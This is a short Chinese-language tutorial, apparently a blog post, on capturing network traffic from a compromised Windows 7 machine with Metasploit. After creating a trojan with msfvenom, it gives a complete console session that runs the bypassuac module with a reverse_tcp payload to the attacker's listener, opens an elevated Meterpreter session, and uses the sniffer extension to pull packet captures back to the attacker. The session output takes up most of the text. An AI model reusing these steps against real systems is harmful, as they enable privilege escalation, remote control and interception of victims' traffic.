msf中内网抓取本机数据包

１，使用msf，利用msfvenom生成木马程序,在win7 sp1测试通过．(http://www.2cto.com/Article/201304/199847.html）

２，使用sniffer模块

在win7 下要多加一步,就是过UAC.这里利用 exploit/windows/local/bypassuac

另外还有一个工具可以使用,不过没测:Win7Elevate32.exe

Bypass UAC: http://www.metasploit.com/modules/exploit/windows/local/bypassuac

view source01 meterpreter > background 

02 [*] Backgrounding session 6... 

03 msf  exploit(handler) > use exploit/windows/local/bypassuac 

04 msf  exploit(bypassuac) > show options 

05   

06 Module options (exploit/windows/local/bypassuac): 

07   

08    Name     Current Setting  Required  Description 

09    ----     ---------------  --------  ----------- 

10    SESSION  4                yes       The session to run this module on. 

11   

12 Payload options (windows/meterpreter/reverse_tcp): 

13   

14    Name      Current Setting  Required  Description 

15    ----      ---------------  --------  ----------- 

16    EXITFUNC  process          yes       Exit technique: seh, thread, process, none 

17    LHOST     192.168.0.133    yes       The listen address 

18    LPORT     443              yes       The listen port 

19   

20 Exploit target: 

21   

22    Id  Name 

23    --  ---- 

24    0   Windows 

25   

26 msf  exploit(bypassuac) > set SESSION 6 

27 SESSION => 6 

28 msf  exploit(bypassuac) > exploit 

29   

30 [*] Started reverse handler on 192.168.0.133:443  

31 [*] UAC is Enabled, checking level... 

32 [+] UAC is set to Default 

33 [+] BypassUAC can bypass this setting, continuing... 

34 [*] Checking admin status... 

35 [+] Part of Administrators group! Continuing... 

36 [*] Uploading the bypass UAC executable to the filesystem... 

37 [*] Meterpreter stager executable 73802 bytes long being uploaded.. 

38 [*] Uploaded the agent to the filesystem.... 

39 [*] Sending stage (752128 bytes) to 192.168.0.103 

40 [*] Meterpreter session 7 opened (192.168.0.133:443 -> 192.168.0.103:2309) at 2013-04-02 00:34:51 +0800 

41   

42 meterpreter >  

43 meterpreter > pwd

44 C:\Windows\System32 

45   

46 meterpreter > use sniffer 

47 Loading extension sniffer...success. 

48 meterpreter > sniffer_interfaces  

49   

50 1 - 'WAN Miniport (Network Monitor)' ( type:3 mtu:1514 usable:true dhcp:false wifi:false ) 

51 2 - 'Intel(R) 82567LM Gigabit Network Connection' ( type:0 mtu:1514 usable:true dhcp:false wifi:false ) 

52 3 - 'VMware Virtual Ethernet Adapter for VMnet1' ( type:0 mtu:1514 usable:true dhcp:false wifi:false ) 

53 4 - '11b/g/n  Wireless LAN Mini-PCI Express Adapter II' ( type:0 mtu:1514 usable:true dhcp:true wifi:false ) 

54 5 - 'VMware Virtual Ethernet Adapter for VMnet8' ( type:0 mtu:1514 usable:true dhcp:false wifi:false ) 

55   

56 meterpreter > sniffer_start 4 

57 [*] Capture started on interface 4 (50000 packet buffer) 

58 meterpreter > sniffer_stats 4 

59 [*] Capture statistics for interface 4 

60     packets: 2 

61     bytes: 115 

62 meterpreter > sniffer_stats 4 

63 [*] Capture statistics for interface 4 

64     packets: 173 

65     bytes: 109330 

66 meterpreter > sniffer_dump 4 /tmp/mydump.cap 

67 [*] Flushing packet capture buffer for interface 4... 

68 [*] Flushed 225 packets (122383 bytes) 

69 [*] Downloaded 100% (122383/122383)... 

70 [*] Download completed, converting to PCAP... 

71 [*] PCAP file written to /tmp/mydump.cap 

72 meterpreter > sniffer_stop 4 

73 [*] Capture stopped on interface 4 

74 [*] There are 32 packets (6987 bytes) remaining 

75 [*] Download or release them using 'sniffer_dump' or 'sniffer_release'

76 meterpreter >

最后收集的网络数据包就可以用wireshark打开查看.找到感兴趣的内容